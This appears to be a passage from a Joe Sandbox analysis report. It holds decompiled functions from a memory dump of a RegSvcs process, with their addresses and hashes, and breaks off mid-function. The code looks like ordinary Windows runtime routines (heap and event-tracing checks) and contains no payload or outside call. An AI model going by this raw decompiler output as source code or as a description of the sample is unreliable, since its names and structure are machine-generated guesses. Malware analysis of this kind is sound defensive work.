0x0192378b
0x0192378b
0x01923792
0x01923795
0x01923795
0x01923798
0x01923798
0x0192379b
0x0192379b
0x018c91a3
0x018c91a9
0x018c91b0
0x018c91b4
0x018c91b4
0x018c91bb
0x018c91c0
0x018c91c5
0x018c91c7
0x019237da
0x018c91cd
0x018c91cd
0x018c91cd
0x018c91d2
0x018c91d5
0x018c9239
0x018c9239
0x018c91d7
0x018c91db
0x018c91e1
0x018c91e7
0x018c91fd
0x018c9203
0x018c921e
0x018c9223
0x00000000
0x018c9223
0x018c9205
0x018c9208
0x018c920c
0x018c9214
0x018c9214
0x018c91e9
0x018c91e9
0x018c91ee
0x018c91f3
0x018c91f3
0x018c91f3
0x018c91e7
0x00000000
0x018c91db
0x018c9187
0x018c9168

Memory Dump Source

Source File: 00000008.00000002.357578036.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true

Associated: 00000008.00000002.359332215.00000000019BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.359384313.00000000019BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f033abcd1398878228224c4d9d82bf2e919b0063c9f552faf0d0bbbce6bcb4a3
Instruction ID: 08a42b94a073b27d2da4b075abc004d3ed1ce7b642d18334e1049af68f4c0745
Opcode Fuzzy Hash: f033abcd1398878228224c4d9d82bf2e919b0063c9f552faf0d0bbbce6bcb4a3
Instruction Fuzzy Hash: B831C571E01A49DFDB26DB6CC1897ACBBF5BB89718F14818EC518A7241C338EA80CB51

Uniqueness

Uniqueness Score: -1.00%

Function 018F1DB5 Relevance: .1, Instructions: 87
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E018F1DB5(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr* _v20;
				void* _t22;
				char _t23;
				void* _t36;
				intOrPtr _t42;
				intOrPtr _t43;

				_v12 = __ecx;
				_t43 = 0;
				_v20 = __edx;
				_t42 =  *__edx;
				 *__edx = 0;
				_v16 = _t42;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(6);
				_push(0);
				_push(__ecx);
				_t36 = ((0 | __ecx !=  *((intOrPtr*)( *[fs:0x30] + 8))) - 0x00000001 & 0xc0000000) + 0x40000002;
				_push(_t36);
				_t22 = E018EF460();
				if(_t22 < 0) {
					if(_t22 == 0xc0000023) {
						goto L1;
					}
					L3:
					return _t43;
				}
				L1:
				_t23 = _v8;
				if(_t23 != 0) {
					_t38 = _a4;
					if(_t23 >  *_a4) {
						_t42 = L018E4620(_t38,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t23);
						if(_t42 == 0) {
							goto L3;
						}
						_t23 = _v8;
					}
					_push( &_v8);
					_push(_t23);
					_push(_t42);
					_push(6);
					_push(_t43);
					_push(_v12);
					_push(_t36);
					if(E018EF460() < 0) {
						if(_t42 != 0 && _t42 != _v16) {
							L018E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t43, _t42);
						}
						goto L3;
					}
					 *_v20 = _t42;
					 *_a4 = _v8;
				}
				_t43 = 1;
				goto L3;
			}

0x018f1dc2
0x018f1dc5
0x018f1dc7
0x018f1dcc
0x018f1dce
0x018f1dd6
0x018f1ddf
0x018f1de0
0x018f1de1
0x018f1de5
0x018f1de8
0x018f1def
0x018f1df0
0x018f1df6
0x018f1df7
0x018f1dfe
0x018f1e1a
0x00000000
0x00000000
0x018f1e0b
0x018f1e12
0x018f1e12
0x018f1e00
0x018f1e00
0x018f1e05
0x018f1e1e
0x018f1e23
0x0193570f
0x01935713
0x00000000
0x00000000
0x01935719
0x01935719
0x018f1e2c
0x018f1e2d
0x018f1e2e
0x018f1e2f
0x018f1e31
0x018f1e32
0x018f1e35
0x018f1e3d
0x01935723
0x0193573d
0x0193573d
0x00000000
0x01935723
0x018f1e49
0x018f1e4e
0x018f1e4e
0x018f1e09
0x00000000

Memory Dump Source

Source File: 00000008.00000002.357578036.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true

Associated: 00000008.00000002.359332215.00000000019BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.359384313.00000000019BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
Instruction ID: 883b54e3e9d6fb0d271df9a2c54e247eb1194ab6a28ba7f2d5ecbc2a1b6fd21b
Opcode Fuzzy Hash: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
Instruction Fuzzy Hash: 33215E72A00119EFD721CF99CC88EABBBBDEF85B54F154059EA05D7220D634AF11CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 01946C0A Relevance: .1, Instructions: 79
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E01946C0A(signed short* __ecx, signed char __edx, signed char _a4, signed char _a8) {
				signed short* _v8;
				signed char _v12;
				void* _t22;
				signed char* _t23;
				intOrPtr _t24;
				signed short* _t44;
				void* _t47;
				signed char* _t56;
				signed char* _t58;

				_t48 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t44 = __ecx;
				_v12 = __edx;
				_v8 = __ecx;
				_t22 = E018E7D50();
				_t58 = 0x7ffe0384;
				if(_t22 == 0) {
					_t23 = 0x7ffe0384;
				} else {
					_t23 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				}
				if( *_t23 != 0) {
					_t24 =  *0x19b7b9c; // 0x0
					_t47 = ( *_t44 & 0x0000ffff) + 0x30;
					_t23 = L018E4620(_t48,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t24 + 0x180000, _t47);
					_t56 = _t23;
					if(_t56 != 0) {
						_t56[0x24] = _a4;
						_t56[0x28] = _a8;
						_t56[6] = 0x1420;
						_t56[0x20] = _v12;
						_t14 =  &(_t56[0x2c]); // 0x2c
						E0190F3E0(_t14, _v8[2],  *_v8 & 0x0000ffff);
						_t56[0x2c + (( *_v8 & 0x0000ffff) >> 1) * 2] = 0;
						if(E018E7D50() != 0) {
							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						}
						_push(_t56);
						_push(_t47 - 0x20);
						_push(0x402);
						_push( *_t58 & 0x000000ff);
						E01909AE0();
						_t23 = L018E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t56);
					}
				}
				return _t23;
			}

0x01946c0a
0x01946c0f
0x01946c10
0x01946c13
0x01946c15
0x01946c19
0x01946c1c
0x01946c21
0x01946c28
0x01946c3a
0x01946c2a
0x01946c33
0x01946c33
0x01946c3f
0x01946c48
0x01946c4d
0x01946c60
0x01946c65
0x01946c69
0x01946c73
0x01946c79
0x01946c7f
0x01946c86
0x01946c90
0x01946c94
0x01946ca6
0x01946cb2
0x01946cbd
0x01946cbd
0x01946cc3
0x01946cc7
0x01946ccb
0x01946cd0
0x01946cd1
0x01946ce2
0x01946ce2
0x01946c69
0x01946ced

Memory Dump Source

Source File: 00000008.00000002.357578036.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true

Associated: 00000008.00000002.359332215.00000000019BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.359384313.00000000019BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7908a37339244606f750e833e14ec13f6597c93c28d540cc465d2a60008cbee3
Instruction ID: f8fea979c2dd7ec80da40f985506f852e2afe1257e2d4526d1bffdd805fe3ec3
Opcode Fuzzy Hash: 7908a37339244606f750e833e14ec13f6597c93c28d540cc465d2a60008cbee3
Instruction Fuzzy Hash: 2C21ABB1A00645AFD715DB6CD884E2AB7B8FF49741F040069FA08C7791D635EE50CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 019090AF Relevance: .1, Instructions: 76
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E019090AF(intOrPtr __ecx, void* __edx, intOrPtr* _a4) {
				intOrPtr* _v0;
				void* _v8;
				signed int _v12;
				intOrPtr _v16;
				char _v36;
				void* _t38;
				intOrPtr _t41;
				void* _t44;
				signed int _t45;
				intOrPtr* _t49;
				signed int _t57;
				signed int _t58;
				intOrPtr* _t59;
				void* _t62;
				void* _t63;
				void* _t65;
				void* _t66;
				signed int _t69;
				intOrPtr* _t70;
				void* _t71;
				intOrPtr* _t72;
				intOrPtr* _t73;
				char _t74;

				_t65 = __edx;
				_t57 = _a4;
				_t32 = __ecx;
				_v8 = __edx;
				_t3 = _t32 + 0x14c; // 0x14c
				_t70 = _t3;
				_v16 = __ecx;
				_t72 =  *_t70;
				while(_t72 != _t70) {
					if( *((intOrPtr*)(_t72 + 0xc)) != _t57) {
						L24:
						_t72 =  *_t72;
						continue;
					}
					_t30 = _t72 + 0x10; // 0x10
					if(E0191D4F0(_t30, _t65, _t57) == _t57) {
						return 0xb7;
					}
					_t65 = _v8;
					goto L24;
				}
				_t61 = _t57;
				_push( &_v12);
				_t66 = 0x10;
				if(E018FE5E0(_t57, _t66) < 0) {
					return 0x216;
				}
				_t73 = L018E4620(_t61,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v12);
				if(_t73 == 0) {
					_t38 = 0xe;
					return _t38;
				}
				_t9 = _t73 + 0x10; // 0x10
				 *((intOrPtr*)(_t73 + 0xc)) = _t57;
				E0190F3E0(_t9, _v8, _t57);
				_t41 =  *_t70;
				if( *((intOrPtr*)(_t41 + 4)) != _t70) {
					_t62 = 3;
					asm("int 0x29");
					_push(_t62);
					_push(_t57);
					_push(_t73);
					_push(_t70);
					_t71 = _t62;
					_t74 = 0;
					_v36 = 0;
					_t63 = E018FA2F0(_t62, _t71, 1, 6,  &_v36);
					if(_t63 == 0) {
						L20:
						_t44 = 0x57;
						return _t44;
					}
					_t45 = _v12;
					_t58 = 0x1c;
					if(_t45 < _t58) {
						goto L20;
					}
					_t69 = _t45 / _t58;
					if(_t69 == 0) {
						L19:
						return 0xe8;
					}
					_t59 = _v0;
					do {
						if( *((intOrPtr*)(_t63 + 0xc)) != 2) {
							goto L18;
						}
						_t49 =  *((intOrPtr*)(_t63 + 0x14)) + _t71;
						 *_t59 = _t49;
						if( *_t49 != 0x53445352) {
							goto L18;
						}
						 *_a4 =  *((intOrPtr*)(_t63 + 0x10));
						return 0;
						L18:
						_t63 = _t63 + 0x1c;
						_t74 = _t74 + 1;
					} while (_t74 < _t69);
					goto L19;
				}
				 *_t73 = _t41;
				 *((intOrPtr*)(_t73 + 4)) = _t70;
				 *((intOrPtr*)(_t41 + 4)) = _t73;
				 *_t70 = _t73;
				 *(_v16 + 0xdc) =  *(_v16 + 0xdc) | 0x00000010;
				return 0;
			}

0x019090af
0x019090b8
0x019090bb
0x019090bf
0x019090c2
0x019090c2
0x019090c8
0x019090cb
0x019090cd
0x019414d7
0x019414eb
0x019414eb
0x00000000
0x019414eb
0x019414db
0x019414e6
0x00000000
0x019414f2
0x019414e8
0x00000000
0x019414e8
0x019090d8
0x019090da
0x019090dd
0x019090e5
0x00000000
0x01909139
0x019090fa
0x019090fe
0x01909142
0x00000000
0x01909142
0x01909104
0x01909107
0x0190910b
0x01909110
0x01909118
0x01909147
0x01909148
0x0190914f
0x01909150
0x01909151
0x01909152
0x01909156
0x0190915d
0x01909160
0x01909168
0x0190916c
0x019091bc
0x019091be
0x00000000
0x019091be
0x0190916e
0x01909173
0x01909176
0x00000000
0x00000000
0x0190917c
0x01909180
0x019091b5
0x00000000
0x019091b5
0x01909182
0x01909185
0x01909189
0x00000000
0x00000000
0x0190918e
0x01909190
0x01909198
0x00000000
0x00000000
0x019091a0
0x00000000
0x019091ad
0x019091ad
0x019091b0
0x019091b1
0x00000000
0x01909185
0x0190911a
0x0190911c
0x0190911f
0x01909125
0x01909127
0x00000000

Memory Dump Source

Source File: 00000008.00000002.357578036.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true

Associated: 00000008.00000002.359332215.00000000019BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.359384313.00000000019BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
Instruction ID: 9389130262598a4614a0bd08861ea99ce8f28e88cad893bc7e8d01776ee4f95b
Opcode Fuzzy Hash: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
Instruction Fuzzy Hash: F5217F71A00205EFDB22DF59C844EAABBF8EB58754F14887AE94DA7291D270A9408B90

Uniqueness

Uniqueness Score: -1.00%

Function 018F3B7A Relevance: .1, Instructions: 75
COMMON

Download Yara Rule

C-Code - Quality: 59%

			E018F3B7A(void* __ecx) {
				signed int _v8;
				char _v12;
				intOrPtr _v20;
				intOrPtr _t17;
				intOrPtr _t26;
				void* _t35;
				void* _t38;
				void* _t41;
				intOrPtr _t44;

				_t17 =  *0x19b84c4; // 0x0
				_v12 = 1;
				_v8 =  *0x19b84c0 * 0x4c;
				_t41 = __ecx;
				_t35 = L018E4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t17 + 0x000c0000 | 0x00000008,  *0x19b84c0 * 0x4c);
				if(_t35 == 0) {
					_t44 = 0xc0000017;
				} else {
					_push( &_v8);
					_push(_v8);
					_push(_t35);
					_push(4);
					_push( &_v12);
					_push(0x6b);
					_t44 = E0190AA90();
					_v20 = _t44;
					if(_t44 >= 0) {
						E0190FA60( *((intOrPtr*)(_t41 + 0x20)), 0,  *0x19b84c0 * 0xc);
						_t38 = _t35;
						if(_t35 < _v8 + _t35) {
							do {
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t38 = _t38 +  *((intOrPtr*)(_t38 + 4));
							} while (_t38 < _v8 + _t35);
							_t44 = _v20;
						}
					}
					_t26 =  *0x19b84c4; // 0x0
					L018E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t26 + 0xc0000, _t35);
				}
				return _t44;
			}

0x018f3b89
0x018f3b96
0x018f3ba1
0x018f3bab
0x018f3bb5
0x018f3bb9
0x01936298
0x018f3bbf
0x018f3bc2
0x018f3bc3
0x018f3bc9
0x018f3bca
0x018f3bcc
0x018f3bcd
0x018f3bd4
0x018f3bd6
0x018f3bdb
0x018f3bea
0x018f3bf7
0x018f3bfb
0x018f3bff
0x018f3c09
0x018f3c0a
0x018f3c0b
0x018f3c0f
0x018f3c14
0x018f3c18
0x018f3c18
0x018f3bfb
0x018f3c1b
0x018f3c30
0x018f3c30
0x018f3c3d

Memory Dump Source

Source File: 00000008.00000002.357578036.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true

Associated: 00000008.00000002.359332215.00000000019BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.359384313.00000000019BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 959e1894a306b208312103cd59d95f3c05bd6a3a7f95dbeab15b78d3fe2f72b1
Instruction ID: e043a4a8eb0bf367a9decc2b3dcf9d443db662adbac4f50e5428b96fd0e86b99
Opcode Fuzzy Hash: 959e1894a306b208312103cd59d95f3c05bd6a3a7f95dbeab15b78d3fe2f72b1
Instruction Fuzzy Hash: 8021A172A00109AFDB15DF98CE85F5ABBBEFB44708F150068EA08EB251D375EE51DB90

Uniqueness

Uniqueness Score: -1.00%

Function 01946CF0 Relevance: .1, Instructions: 74
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E01946CF0(void* __edx, intOrPtr _a4, short _a8) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v28;
				char _v36;
				char _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char* _t21;
				void* _t24;
				void* _t36;
				void* _t38;
				void* _t46;

				_push(_t36);
				_t46 = __edx;
				_v12 = 0;
				_v8 = 0;
				_v20 = 0;
				_v16 = 0;
				if(E018E7D50() == 0) {
					_t21 = 0x7ffe0384;
				} else {
					_t21 = ( *[fs:0x30])[0x50] + 0x22a;
				}
				if( *_t21 != 0) {
					_t21 =  *[fs:0x30];
					if((_t21[0x240] & 0x00000004) != 0) {
						if(E018E7D50() == 0) {
							_t21 = 0x7ffe0385;
						} else {
							_t21 = ( *[fs:0x30])[0x50] + 0x22b;
						}
						if(( *_t21 & 0x00000020) != 0) {
							_t56 = _t46;
							if(_t46 == 0) {
								_t46 = 0x18a5c80;
							}
							_push(_t46);
							_push( &_v12);
							_t24 = E018FF6E0(_t36, 0, _t46, _t56);
							_push(_a4);
							_t38 = _t24;
							_push( &_v28);
							_t21 = E018FF6E0(_t38, 0, _t46, _t56);
							if(_t38 != 0) {
								if(_t21 != 0) {
									E01947016(_a8, 0, 0, 0,  &_v36,  &_v28);
									L018E2400( &_v52);
								}
								_t21 = L018E2400( &_v28);
							}
						}
					}
				}
				return _t21;
			}

0x01946cfb
0x01946d00
0x01946d02
0x01946d06
0x01946d0a
0x01946d0e
0x01946d19
0x01946d2b
0x01946d1b
0x01946d24
0x01946d24
0x01946d33
0x01946d39
0x01946d46
0x01946d4f
0x01946d61
0x01946d51
0x01946d5a
0x01946d5a
0x01946d69
0x01946d6b
0x01946d6d
0x01946d6f
0x01946d6f
0x01946d74
0x01946d79
0x01946d7a
0x01946d7f
0x01946d82
0x01946d88
0x01946d89
0x01946d90
0x01946d94
0x01946da7
0x01946db1
0x01946db1
0x01946dbb
0x01946dbb
0x01946d90
0x01946d69
0x01946d46
0x01946dc6

Memory Dump Source

Source File: 00000008.00000002.357578036.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true

Associated: 00000008.00000002.359332215.00000000019BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.359384313.00000000019BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 00a95b32f6423517df9f211bc5e49f5d4491247b219d8edc775c090ecb82e325
Instruction ID: 45a12387d2ba79620157f314924cafc9fffb787a63a189121817ddf2cd63c1d0
Opcode Fuzzy Hash: 00a95b32f6423517df9f211bc5e49f5d4491247b219d8edc775c090ecb82e325
Instruction Fuzzy Hash: 5821D0B25002459BD711DF2CCD44F6BBBECAF92740F04095ABA84C7251EB34CA88C6A2

Uniqueness

Uniqueness Score: -1.00%

Function 0199070D Relevance: .1, Instructions: 72
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E0199070D(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
				char _v8;
				intOrPtr _v11;
				signed int _v12;
				intOrPtr _v15;
				signed int _v16;
				intOrPtr _v28;
				void* __ebx;
				char* _t32;
				signed int* _t38;
				signed int _t60;

				_t38 = __ecx;
				_v16 = __edx;
				_t60 = E019907DF(__ecx, __edx,  &_a4,  &_a8, 2);
				if(_t60 != 0) {
					_t7 = _t38 + 0x38; // 0x29cd5903
					_push( *_t7);
					_t9 = _t38 + 0x34; // 0x6adeeb00
					_push( *_t9);
					_v12 = _a8 << 0xc;
					_t11 = _t38 + 4; // 0x5de58b5b
					_push(0x4000);
					_v8 = (_a4 << 0xc) + (_v16 - ( *__ecx & _v16) >> 4 <<  *_t11) + ( *__ecx & _v16);
					E0198AFDE( &_v8,  &_v12);
					E01991293(_t38, _v28, _t60);
					if(E018E7D50() == 0) {
						_t32 = 0x7ffe0380;
					} else {
						_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						_t21 = _t38 + 0x3c; // 0xc3595e5f
						E019814FB(_t38,  *_t21, _v11, _v15, 0xd);
					}
				}
				return  ~_t60;
			}

0x0199071b
0x01990724
0x01990734
0x01990738
0x0199074b
0x0199074b
0x01990753
0x01990753
0x01990759
0x0199075d
0x01990774
0x01990779
0x0199077d
0x01990789
0x01990795
0x019907a7
0x01990797
0x019907a0
0x019907a0
0x019907af
0x019907c4
0x019907cd
0x019907cd
0x019907af
0x019907dc

Memory Dump Source

Source File: 00000008.00000002.357578036.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true

Associated: 00000008.00000002.359332215.00000000019BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.359384313.00000000019BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
Instruction ID: 6e5c13ce7c9c610c86cd4f1a963c0898bf51c14679da56375c982a04b5133719
Opcode Fuzzy Hash: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
Instruction Fuzzy Hash: B821F5362042049FDB05DF1CCC84A6ABBA9FBD4760F088569F9598B385D630D909CB91

Uniqueness

Uniqueness Score: -1.00%

Function 01947794 Relevance: .1, Instructions: 70
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E01947794(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, unsigned int _a8, void* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _t21;
				void* _t24;
				intOrPtr _t25;
				void* _t36;
				short _t39;
				signed char* _t42;
				unsigned int _t46;
				void* _t50;

				_push(__ecx);
				_push(__ecx);
				_t21 =  *0x19b7b9c; // 0x0
				_t46 = _a8;
				_v12 = __edx;
				_v8 = __ecx;
				_t4 = _t46 + 0x2e; // 0x2e
				_t36 = _t4;
				_t24 = L018E4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t21 + 0x180000, _t36);
				_t50 = _t24;
				if(_t50 != 0) {
					_t25 = _a4;
					if(_t25 == 5) {
						L3:
						_t39 = 0x14b1;
					} else {
						_t39 = 0x14b0;
						if(_t25 == 6) {
							goto L3;
						}
					}
					 *((short*)(_t50 + 6)) = _t39;
					 *((intOrPtr*)(_t50 + 0x28)) = _t25;
					_t11 = _t50 + 0x2c; // 0x2c
					 *((intOrPtr*)(_t50 + 0x20)) = _v8;
					 *((intOrPtr*)(_t50 + 0x24)) = _v12;
					E0190F3E0(_t11, _a12, _t46);
					 *((short*)(_t50 + 0x2c + (_t46 >> 1) * 2)) = 0;
					if(E018E7D50() == 0) {
						_t42 = 0x7ffe0384;
					} else {
						_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					_push(_t50);
					_t19 = _t36 - 0x20; // 0xe
					_push(0x403);
					_push( *_t42 & 0x000000ff);
					E01909AE0();
					_t24 = L018E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t50);
				}
				return _t24;
			}

0x01947799
0x0194779a
0x0194779b
0x019477a3
0x019477ab
0x019477ae
0x019477b1
0x019477b1
0x019477bf
0x019477c4
0x019477c8
0x019477ce
0x019477d4
0x019477e0
0x019477e0
0x019477d6
0x019477d6
0x019477de
0x00000000
0x00000000
0x019477de
0x019477e5
0x019477f0
0x019477f3
0x019477f6
0x019477fd
0x01947800
0x0194780c
0x01947818
0x0194782b
0x0194781a
0x01947823
0x01947823
0x01947830
0x01947831
0x01947838
0x0194783d
0x0194783e
0x0194784f
0x0194784f
0x0194785a

Memory Dump Source

Source File: 00000008.00000002.357578036.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true

Associated: 00000008.00000002.359332215.00000000019BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.359384313.00000000019BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 702f0a347deaa252a8fd766c9b3bade459122b1db527481cd486094a0871598c
Instruction ID: 1c548354a456c8bf0f99e5194ab6351920937d5687482d739ba723f802e66777
Opcode Fuzzy Hash: 702f0a347deaa252a8fd766c9b3bade459122b1db527481cd486094a0871598c
Instruction Fuzzy Hash: A9219272500608EFD729DFA9D884E67BBACEF88340F100569E609D7790D734D900CB94

Uniqueness

Uniqueness Score: -1.00%

Function 018EAE73 Relevance: .1, Instructions: 70
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E018EAE73(intOrPtr __ecx, void* __edx) {
				intOrPtr _v8;
				void* _t19;
				char* _t22;
				signed char* _t24;
				intOrPtr _t25;
				intOrPtr _t27;
				void* _t31;
				intOrPtr _t36;
				char* _t38;
				signed char* _t42;

				_push(__ecx);
				_t31 = __edx;
				_v8 = __ecx;
				_t19 = E018E7D50();
				_t38 = 0x7ffe0384;
				if(_t19 != 0) {
					_t22 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				} else {
					_t22 = 0x7ffe0384;
				}
				_t42 = 0x7ffe0385;
				if( *_t22 != 0) {
					if(E018E7D50() == 0) {
						_t24 = 0x7ffe0385;
					} else {
						_t24 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
					}
					if(( *_t24 & 0x00000010) != 0) {
						goto L17;
					} else {
						goto L3;
					}
				} else {
					L3:
					_t27 = E018E7D50();
					if(_t27 != 0) {
						_t27 =  *[fs:0x30];
						_t38 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22a;
					}
					if( *_t38 != 0) {
						_t27 =  *[fs:0x30];
						if(( *(_t27 + 0x240) & 0x00000004) == 0) {
							goto L5;
						}
						_t27 = E018E7D50();
						if(_t27 != 0) {
							_t27 =  *[fs:0x30];
							_t42 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22b;
						}
						if(( *_t42 & 0x00000020) != 0) {
							L17:
							_t25 = _v8;
							_t36 = 0;
							if(_t25 != 0) {
								_t36 =  *((intOrPtr*)(_t25 + 0x18));
							}
							_t27 = E01947794( *((intOrPtr*)(_t31 + 0x18)), _t36,  *((intOrPtr*)(_t31 + 0x94)),  *(_t31 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_t31 + 0x28)));
						}
						goto L5;
					} else {
						L5:
						return _t27;
					}
				}
			}

0x018eae78
0x018eae7c
0x018eae7e
0x018eae81
0x018eae86
0x018eae8d
0x01932691
0x018eae93
0x018eae93
0x018eae93
0x018eae98
0x018eae9d
0x019326a2
0x019326b4
0x019326a4
0x019326ad
0x019326ad
0x019326b9
0x00000000
0x019326bb
0x00000000
0x019326bb
0x018eaea3
0x018eaea3
0x018eaea3
0x018eaeaa
0x019326c0
0x019326c9
0x019326c9
0x018eaeb3
0x019326d4
0x019326e1
0x00000000
0x00000000
0x019326e7
0x019326ee
0x019326f0
0x019326f9
0x019326f9
0x01932702
0x01932708
0x01932708
0x0193270b
0x0193270f
0x01932711
0x01932711
0x01932725
0x01932725
0x00000000
0x018eaeb9
0x018eaeb9
0x018eaebf
0x018eaebf
0x018eaeb3

Memory Dump Source

Source File: 00000008.00000002.357578036.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true

Associated: 00000008.00000002.359332215.00000000019BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.359384313.00000000019BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
Instruction ID: 1737241f1eb0a185648e355d8410b74267ed65342ea5bf695010f989b269bf00
Opcode Fuzzy Hash: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
Instruction Fuzzy Hash: 8521F672601686DFEB26DB6DC948B2577E8EF85744F0900A1DD08CB792E735DD40C691

Uniqueness

Uniqueness Score: -1.00%

Function 018FFD9B Relevance: .1, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E018FFD9B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				intOrPtr _v8;
				void* _t19;
				intOrPtr _t29;
				intOrPtr _t32;
				intOrPtr _t35;
				intOrPtr _t37;
				intOrPtr* _t40;

				_t35 = __edx;
				_push(__ecx);
				_push(__ecx);
				_t37 = 0;
				_v8 = __edx;
				_t29 = __ecx;
				if( *((intOrPtr*)( *[fs:0x18] + 0xfbc)) != 0) {
					_t40 =  *((intOrPtr*)( *[fs:0x18] + 0xfbc));
					L3:
					_t19 = _a4 - 4;
					if(_t19 != 0) {
						if(_t19 != 1) {
							L7:
							return _t37;
						}
						if(_t35 == 0) {
							L11:
							_t37 = 0xc000000d;
							goto L7;
						}
						if( *((intOrPtr*)(_t40 + 4)) != _t37) {
